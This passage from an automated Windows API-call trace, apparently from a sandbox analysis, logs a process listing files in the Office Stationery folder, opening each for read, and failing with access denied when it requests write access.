lpNewFilePointer=0x0) returned 1 [0087.398] CloseHandle (hObject=0x424) returned 1 [0087.398] AreFileApisANSI () returned 1 [0087.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0087.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82568 [0087.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg") returned 68 [0087.398] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.398] GetLastError () returned 0x5 [0087.398] GetLastError () returned 0x5 [0087.398] SetLastError (dwErrCode=0x5) [0087.398] GetLastError () returned 0x5 [0087.398] SetLastError (dwErrCode=0x5) [0087.398] GetLastError () returned 0x5 [0087.398] SetLastError (dwErrCode=0x5) [0087.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0087.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0087.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.398] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0087.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0087.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0087.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.399] AreFileApisANSI () returned 1 [0087.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm", lpUsedDefaultChar=0x0) returned 77 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0087.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.400] AreFileApisANSI () returned 1 [0087.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0087.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0087.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 77 [0087.400] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.401] GetFileType (hFile=0x424) returned 0x1 [0087.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.401] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.401] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.401] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.401] CloseHandle (hObject=0x424) returned 1 [0087.401] AreFileApisANSI () returned 1 [0087.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0087.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c458 [0087.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm") returned 77 [0087.402] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.402] GetLastError () returned 0x5 [0087.402] GetLastError () returned 0x5 [0087.402] SetLastError (dwErrCode=0x5) [0087.402] GetLastError () returned 0x5 [0087.402] SetLastError (dwErrCode=0x5) [0087.402] GetLastError () returned 0x5 [0087.402] SetLastError (dwErrCode=0x5) [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0087.402] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.402] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.402] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0087.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0087.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0087.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.403] AreFileApisANSI () returned 1 [0087.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg", lpUsedDefaultChar=0x0) returned 75 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.403] AreFileApisANSI () returned 1 [0087.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85940 [0087.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 75 [0087.404] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.404] GetFileType (hFile=0x424) returned 0x1 [0087.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0087.405] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.405] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.405] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.405] CloseHandle (hObject=0x424) returned 1 [0087.405] AreFileApisANSI () returned 1 [0087.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x856c0 [0087.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 75 [0087.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.406] GetLastError () returned 0x5 [0087.406] GetLastError () returned 0x5 [0087.406] SetLastError (dwErrCode=0x5) [0087.406] GetLastError () returned 0x5 [0087.406] SetLastError (dwErrCode=0x5) [0087.406] GetLastError () returned 0x5 [0087.406] SetLastError (dwErrCode=0x5) [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.406] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0087.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.407] AreFileApisANSI () returned 1 [0087.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm", lpUsedDefaultChar=0x0) returned 72 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0087.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.407] AreFileApisANSI () returned 1 [0087.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0087.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0087.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 72 [0087.408] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.408] GetFileType (hFile=0x424) returned 0x1 [0087.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0087.408] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.408] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, 